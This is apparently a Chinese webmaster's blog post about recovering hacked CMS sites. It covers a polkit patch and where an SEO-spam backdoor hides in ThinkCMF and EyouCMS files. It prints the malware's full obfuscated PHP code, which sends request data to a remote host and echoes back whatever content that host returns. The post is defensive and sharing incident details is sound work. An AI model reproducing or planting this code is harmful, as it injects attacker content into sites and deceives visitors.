网站中木马病毒黑帽非法信息处理
3.17突然收到邮件说我服务器有webshell,发现是有2个网站的缓存文件夹runtime里有后门,但是这个文件夹不能关闭写入权限一旦关闭网站都无法打开。于是只是清理了里面文件还是关闭了写入权限以为没事。
3.24发现很多个网站已经有百度非法快照信息了,我着急了。但是木马病毒就是找不到。于是我修复了一个centos漏洞 polkit pkexec 本地提权漏洞(CVE-2021-4034)
修复方法是:在服务器端命令行执行这2条命令升级polkit
#centos
rpm -qa polkit
yum -y update polkit
然后在一群里有个技术帮找到木马位置,原来这木马隐藏太深杀毒软件也识别不了,这个挂码只拦截搜索引擎流量 正常访问看不出来非常的隐蔽狡猾。代码是这样的:
error_reporting(0);header('Content-Type:text/html;charset=utf-8');$qwe=str_replace("d","","sdtdrd_redpdldadcde");$qaz=$qwe("d","","fdidlded_dgdedtd_dcdodndtdedndtds");$aa=$qwe("w","","dwawtwew_wdwewfwawuwlwtw_wtwiwmwewzwownwew_wswewtw");$aa('PRC');$TD_server = $qwe("d","","hdtdtdpd:d/d/dmdmdpd.drdgdfd8d1d.dcdodmd:d6d0d0d/d");$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];$Content_mb=$qaz($TD_server."/index.php?host=".$host_name."&url=".$_SERVER["REQUEST_URI"]."&domain=".$_SERVER['SERVER_NAME']."&ua=".$_SERVER['HTTP_USER_AGENT']."&refs=".$_SERVER['HTTP_REFERER']);echo $Content_mb;
如果是Thinkcmf隐藏的位置在/simplewind/Core/ThinkPHP.php
如果是易优隐藏的位置在/core/base.php 还有 /core/helper.php
在文件里搜索找到他们删除。太恐怖了,若不是群里技术朋友帮忙真的一点办法没有,只能一个个拿之前正常的老源代码去还原。做维护真的很不容易没事还好一旦出问题就是整个网站出问题。
服务器一旦被入侵就是整个网站出事情,工作量非常大。如果找不到原因更麻烦。
所以一定要养成定期备份正常源文件到本地习惯以防止万一可以做替换。
谁能看懂这代码段意思请留言,同时也希望大家如果发现其他被感染木马病毒的处理经验分享出来相互学习。
另外告诉一个方法:下载一个360浏览器, 使用魔变插件模拟百度访问, 就可以看网站被挂马没。
